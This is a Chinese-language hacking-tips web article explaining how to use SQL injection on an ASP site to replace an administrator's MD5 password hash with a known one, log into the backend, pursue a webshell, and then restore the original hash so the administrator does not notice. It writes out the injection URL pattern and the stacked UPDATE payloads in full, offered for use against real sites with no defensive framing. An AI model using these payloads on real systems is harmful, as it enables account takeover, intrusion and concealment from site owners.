你的位置:聚盟网 >> 网络学院 >> 技巧 >> 详细内容 在线投稿

通过注sql入修改管理员密码

www.juoooo.com  2011年11月16日07:54  来源: 互联网   查看:   我要评论(0)  收藏  字号: TTT

很多时候我们找到了注入点,管理员用户名也猜到了,可就是破解不了Md5密文。很多人到这里都会选择放弃。我们知道sql注入可以进行字段查询,既然可以查询,那么它同样也可以进行字段更新。我们只要把管理员密码的Md5值替换为我们自己的可破解的Md5即可。

注入点已经找到:http://xxx.com/book.asp?id=1996
我刚已经用NB检测过了。可以看到,存在表段 shop_admin。
密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c
注射的语句如下:
;update shop_admin set password='新MD5加密密码' where
password='d4716077c2ba075c'--
比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码。这里用明小子的工具就能转换了。
wmmhacker - f8dc763194f29433
;update shop_admin set password='f8dc763194f29433' where
password='d4716077c2ba075c'--

我们来测试。看见了,页面没有返回错误,表示成功了。
现在我们对shop_admin表段下的密码做重新解猜。

[adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433
大家对比一下,已经改变了。现在我们可以登陆了。
进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。
接着,别忘了把管理员密码还原。不然他会发现滴!

;update shop_admin set password='d4716077c2ba075c' where
password='f8dc763194f29433'--

编辑: 伊小露
分享到:
顶:82 踩:89
【已经有502人表态】
73票
超赞
63票
震惊
60票
不解
56票
愤怒
55票
支持
58票
高兴
65票
无聊
72票
杯具
发表评论

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】
糗事吧 牛吧 私房话 经典吧
祝福墙许愿墙
随手记-天天记帐本
邀请达人
2013祝福短信,节日祝福语